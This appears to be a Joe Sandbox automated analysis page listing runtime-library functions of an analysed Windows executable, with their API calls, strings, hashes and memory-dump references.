Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$p$p
API String ID: 3215553584-1995029353
Opcode ID: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
Instruction ID: fe2bc365a4d49583b2bebf795b07a66cec81b956944aabd3d4c083bd826ea4b8
Opcode Fuzzy Hash: 9cfabab22772c1b1a92093eacd3b19611c5f4505ff0596b1d416edb920a0599b
Instruction Fuzzy Hash: 19128271A4A14386FB20BE18D584A7AF6A1FB40754FD64735D68A47AF4DF3CE980CB20

Function 00007FF7ABC03130 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC0319B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF7ABC031E3
_Getctype.LIBCPMT ref: 00007FF7ABC031FB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC032B3
_Getwctype.LIBCPMT ref: 00007FF7ABC03301

Strings

bad locale name, xrefs: 00007FF7ABC032D6

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: std::_$Lockit$GetctypeGetwctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 1386471777-1405518554
Opcode ID: e62eab9b983b0a96b3a03dab26092bc602c17f6bae3189a7fb5b30f2c2a23aa8
Instruction ID: 5dba704f9fce7bd195aea87e4c9e40ca5c19239f658711d150003e0a6ba58304
Opcode Fuzzy Hash: e62eab9b983b0a96b3a03dab26092bc602c17f6bae3189a7fb5b30f2c2a23aa8
Instruction Fuzzy Hash: 83517C22B0AB418AFB14EBA8D4506BCB361BF94748F854135DF4D26A76CF38E6568320

Function 00007FF7ABC4812C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7ABC483DE,?,?,?,00007FF7ABC480D0,?,?,?,00007FF7ABC44CB1), ref: 00007FF7ABC481B1
GetLastError.KERNEL32(?,?,?,00007FF7ABC483DE,?,?,?,00007FF7ABC480D0,?,?,?,00007FF7ABC44CB1), ref: 00007FF7ABC481BF
LoadLibraryExW.KERNEL32(?,?,?,00007FF7ABC483DE,?,?,?,00007FF7ABC480D0,?,?,?,00007FF7ABC44CB1), ref: 00007FF7ABC481E9
FreeLibrary.KERNEL32(?,?,?,00007FF7ABC483DE,?,?,?,00007FF7ABC480D0,?,?,?,00007FF7ABC44CB1), ref: 00007FF7ABC48257
GetProcAddress.KERNEL32(?,?,?,00007FF7ABC483DE,?,?,?,00007FF7ABC480D0,?,?,?,00007FF7ABC44CB1), ref: 00007FF7ABC48263

Strings

api-ms-, xrefs: 00007FF7ABC481D1

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
Instruction ID: f48c21eb65a00820aa6f8df44051ed2656a3f171a55ac73a0532df0c2fe10151
Opcode Fuzzy Hash: 8864194d474db3d65ec105c5ed8e5a0c86a313de0dfdc066029e67cf2a800a39
Instruction Fuzzy Hash: ED312B21B1BA4291EE21FB1AA404974A795FF44B60FDB0535DD2D47770DF3CE6408720

Function 00007FF7ABC56F84 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7ABC56F93
FlsGetValue.KERNEL32 ref: 00007FF7ABC56FA8
FlsSetValue.KERNEL32 ref: 00007FF7ABC56FC9
FlsSetValue.KERNEL32 ref: 00007FF7ABC56FF6
FlsSetValue.KERNEL32 ref: 00007FF7ABC57007
FlsSetValue.KERNEL32 ref: 00007FF7ABC57018
SetLastError.KERNEL32 ref: 00007FF7ABC57033

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 965699795a8efeb03b1aaa260825cf1e99b3a3a61e3bee4e10dd9684d409e1c3
Instruction ID: 5e0d7db3bf0052c242b0736caba6a9ecebaed5e214cf2574d466661339af79d2
Opcode Fuzzy Hash: 965699795a8efeb03b1aaa260825cf1e99b3a3a61e3bee4e10dd9684d409e1c3
Instruction Fuzzy Hash: 8A214C20E8F74242FA94B32D96D5939E2925F44BB0FD60735E93E47AF6DE6CA4814330

Function 00007FF7ABC67F90 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7ABC67FC1
GetLastError.KERNEL32 ref: 00007FF7ABC67FCD
CloseHandle.KERNEL32 ref: 00007FF7ABC67FE5
CreateFileW.KERNEL32 ref: 00007FF7ABC68010
WriteConsoleW.KERNEL32 ref: 00007FF7ABC6802F

Strings

CONOUT$, xrefs: 00007FF7ABC67FF1

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 8723b2e35b52bb47c997a7ddbdfaf2dcdaa05dd080ae08f39955e494e257826b
Instruction ID: 0fbc2b2357aacfa26fd34384af337e768f803e5df9220d0cbd5efca8d6808b6b
Opcode Fuzzy Hash: 8723b2e35b52bb47c997a7ddbdfaf2dcdaa05dd080ae08f39955e494e257826b
Instruction Fuzzy Hash: 2611D331B19A4182E750AB5AF854F29A7A0FB88BE4F810235EA5D837B4CF3CD9548750

Function 00007FF7ABC41ED8 Relevance: 9.2, APIs: 6, Instructions: 206COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF7ABC41F48
MultiByteToWideChar.KERNEL32 ref: 00007FF7ABC41FE6
LCMapStringEx.KERNEL32 ref: 00007FF7ABC4204F
LCMapStringEx.KERNEL32 ref: 00007FF7ABC420A1
LCMapStringEx.KERNEL32 ref: 00007FF7ABC42146
WideCharToMultiByte.KERNEL32 ref: 00007FF7ABC421A0

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: ByteCharMultiStringWide
String ID:
API String ID: 2829165498-0
Opcode ID: 74732c29140062126d5773efcb4aea144f1b9c16ea490256da8086c255d1fef1
Instruction ID: 035278dd0488068e5d0b7be5c6b13ff4f484ad3e7cf87e3cd90a8a69d31bb9dc
Opcode Fuzzy Hash: 74732c29140062126d5773efcb4aea144f1b9c16ea490256da8086c255d1fef1
Instruction Fuzzy Hash: 3B81D132A1A74186EB20AF19A445B69F6E2FF447E4F850231EA5D47BF4EF3CD9418720

Function 00007FF7ABC4E4B4 Relevance: 9.2, APIs: 6, Instructions: 157COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4E526
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4E557
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4E597
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4E5D9
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4E60E
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7ABC4E68B

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 512c3bfb6fb534b7f4d723734eaf0639c7065fc19dd132c4fc9f5e7a23f7e003
Instruction ID: 07d7ccabff56743dc01dd25864f0db8782390b965ab97940163d2f8c67741666
Opcode Fuzzy Hash: 512c3bfb6fb534b7f4d723734eaf0639c7065fc19dd132c4fc9f5e7a23f7e003
Instruction Fuzzy Hash: 3951D82290E68785E756BF2CD0547BDBBA29F01B44FCB8031C68D073B5DE2DA905C725

Function 00007FF7ABC421D4 Relevance: 9.1, APIs: 6, Instructions: 94threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00007FF7ABC42225
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7ABC41192,?,?,?,00007FF7ABC29640), ref: 00007FF7ABC42244
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7ABC41192,?,?,?,00007FF7ABC29640), ref: 00007FF7ABC42266
sys_get_time.LIBCPMT ref: 00007FF7ABC42281
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7ABC41192,?,?,?,00007FF7ABC29640), ref: 00007FF7ABC422A7
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,00007FF7ABC41192,?,?,?,00007FF7ABC29640), ref: 00007FF7ABC422BF

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThreadsys_get_time
String ID:
API String ID: 184115430-0
Opcode ID: aff59c7da1a817e9fd2f999baedb90512d5d413d8c3d5ceba67cde38630bac77
Instruction ID: c50572ebe117368415b02ff051e913e1461ec5895e4dd0417476c1d588da5bde
Opcode Fuzzy Hash: aff59c7da1a817e9fd2f999baedb90512d5d413d8c3d5ceba67cde38630bac77
Instruction Fuzzy Hash: 1641A336929A02C6E774AF18D445A38F372FB04B55F814031D64D8A6B8EF3CE981CB20

Function 00007FF7ABC36B70 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC36B9B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC36BC0
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC36BEA
std::_Facet_Register.LIBCPMT ref: 00007FF7ABC36C61
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC36C7B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC36CA3

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: caa3c6f710cb8e278486d4d65da6a2ceeae2fd877d4b1f4ee0f7164d5ff37b9c
Instruction ID: bb16b52962e363b6c73175d94af957691bc4ee36039a47bfaddc8199af426b31
Opcode Fuzzy Hash: caa3c6f710cb8e278486d4d65da6a2ceeae2fd877d4b1f4ee0f7164d5ff37b9c
Instruction Fuzzy Hash: 85318622A0EA0285EA19FF1DE450979F3A1FB44798FDD0131EA8D076B5DE3CE445C720

Function 00007FF7ABC23430 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC2345B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC23480
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC234AA
std::_Facet_Register.LIBCPMT ref: 00007FF7ABC23521
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC2353B
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC23563

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 552fd28a470ee2f8af0352d08e3bbbce90724b0011e91529646cf39f334a3414
Instruction ID: 644d5f5a1f7860070aad0bc16a3434af5cf0bbd894a944a539f9eaed0015d775
Opcode Fuzzy Hash: 552fd28a470ee2f8af0352d08e3bbbce90724b0011e91529646cf39f334a3414
Instruction Fuzzy Hash: 2731B326A0AA4285FA25FF1DE450979F7A1FB84B98FCA0131EA5D077B5DE3CE441C720

Function 00007FF7ABC272E0 Relevance: 9.1, APIs: 6, Instructions: 90COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC2730B
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC27330
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC2735A
std::_Facet_Register.LIBCPMT ref: 00007FF7ABC273D1
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC273EB
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC27413

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
Instruction ID: 056d0d70a0a6f46f33e6d75d56a5d6339b58b6b63fd657073b50843a589c414a
Opcode Fuzzy Hash: 1c84222e05613f977c5b688f6bbbf9ebbf24f5f298f0cd1f439c29d32f2841cd
Instruction Fuzzy Hash: 7D317562B0AA0281EB15BB1DE48097AF361FB84B94F990132DA4D077B6DE3CE445C764

Function 00007FF7ABC3F3A0 Relevance: 9.1, APIs: 6, Instructions: 81COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC3F3B5
std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC3F3DA
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC3F404
std::_Facet_Register.LIBCPMT ref: 00007FF7ABC3F47B
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC3F49C
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF7ABC3F4AF

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 2d3745aafcd326ba4aafe73d14ccab1966c2749e1e67ce425b4515f409669fc7
Instruction ID: 721bca20f207cc23d28269371ecd223abbebd4904394671203aa1957309197ee
Opcode Fuzzy Hash: 2d3745aafcd326ba4aafe73d14ccab1966c2749e1e67ce425b4515f409669fc7
Instruction Fuzzy Hash: 5631A722A0AE4282FB59BB5DD480979E750EF447A4FC90532DE1D476F5DE7CE44AC320

Function 00007FF7ABC45CD0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 320COMMONLIBRARYCODE

Download Yara Rule

APIs

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7ABC45E6E
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7ABC46197

Strings

csm, xrefs: 00007FF7ABC45E95
csm, xrefs: 00007FF7ABC45E17
csm, xrefs: 00007FF7ABC45DB5

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 3523768491-393685449
Opcode ID: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
Instruction ID: 2524141ceca2a61c1547e7e6db8153b6af41500cedc3a463141210f565c778aa
Opcode Fuzzy Hash: 7c0225ce4f9cf81c070885651d4cdc53d8face681bbe08c4a7f54441e706e6bd
Instruction Fuzzy Hash: CEE1D57290A7818AE710EF68D489BADB7A2FB45748F920135DE8D47676CF3CE681C710

Function 00007FF7ABC570FC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC5710B
FlsSetValue.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC57141
FlsSetValue.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC5716E
FlsSetValue.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC5717F
FlsSetValue.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC57190
SetLastError.KERNEL32(?,?,?,00007FF7ABC5167D,?,?,?,?,00007FF7ABC5A1B8,?,?,?,00007FF7ABC447BB), ref: 00007FF7ABC571AB

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f521a4c6661220b9fac6b69270666febb78f0bed29bee679923dc317d250746d
Instruction ID: 365c3c2a6a340f3c267d817b18b3659d7017bc511537e94f1f9ac55192317b2c
Opcode Fuzzy Hash: f521a4c6661220b9fac6b69270666febb78f0bed29bee679923dc317d250746d
Instruction Fuzzy Hash: 4B118120B4B35342FA9477299A9193AD1929F447B0F860735D83E067F6DE2CA4814330

Function 00007FF7ABC02E20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FF7ABC02E8B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00007FF7ABC02ED3
_Getctype.LIBCPMT ref: 00007FF7ABC02EEB
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF7ABC02F7B

Strings

bad locale name, xrefs: 00007FF7ABC02F9E

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 2967684691-1405518554
Opcode ID: a721d668b7db89a30cc0786e94b9041a1d78a689daa74e6852f3cdc1800c5de8
Instruction ID: a7bbffb83612138339a4883b247665e92c4e2288d6ab162cbabb1ea124a60ee4
Opcode Fuzzy Hash: a721d668b7db89a30cc0786e94b9041a1d78a689daa74e6852f3cdc1800c5de8
Instruction Fuzzy Hash: A541AD22B0AB4189FB14EFB8D450ABDB364EF40788F854034DE4D66AB6DF38D656D324

Function 00007FF7ABC08CC0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 113COMMON

Download Yara Rule

APIs

__std_fs_code_page.LIBCPMT ref: 00007FF7ABC08D99

Strings

exists, xrefs: 00007FF7ABC08F47
status, xrefs: 00007FF7ABC08F58

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490878647.00007FF7ABC8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490900932.00007FF7ABC91000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7abc00000_file.jbxd

Similarity

API ID: __std_fs_code_page
String ID: exists$status
API String ID: 1686256323-1990824825
Opcode ID: 0701f3e1eecd133e33545e0bdbcf4b1d469c1f3468a994dfc44bfeb7e812a6a5
Instruction ID: eb5bb2bf4e70b39b106f74748c6d10ae147855c7941d25657201e2fc3a658b9d
Opcode Fuzzy Hash: 0701f3e1eecd133e33545e0bdbcf4b1d469c1f3468a994dfc44bfeb7e812a6a5
Instruction Fuzzy Hash: 1B41FC23F15A429AFB00EBB8D4016FDA372BB44758F814635DE5D22AF9EE38D546C350

Function 00007FF7ABC4875C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF7ABC48781
GetProcAddress.KERNEL32 ref: 00007FF7ABC48797
FreeLibrary.KERNEL32 ref: 00007FF7ABC487BE

Strings

mscoree.dll, xrefs: 00007FF7ABC48778
CorExitProcess, xrefs: 00007FF7ABC48790

Memory Dump Source

Source File: 00000000.00000002.1490799711.00007FF7ABC01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ABC00000, based on PE: true

Associated: 00000000.00000002.1490782544.00007FF7ABC00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1490854147.00007FF7ABC70000.00000002.00000001.01000000.00000003.sdmpDownload File
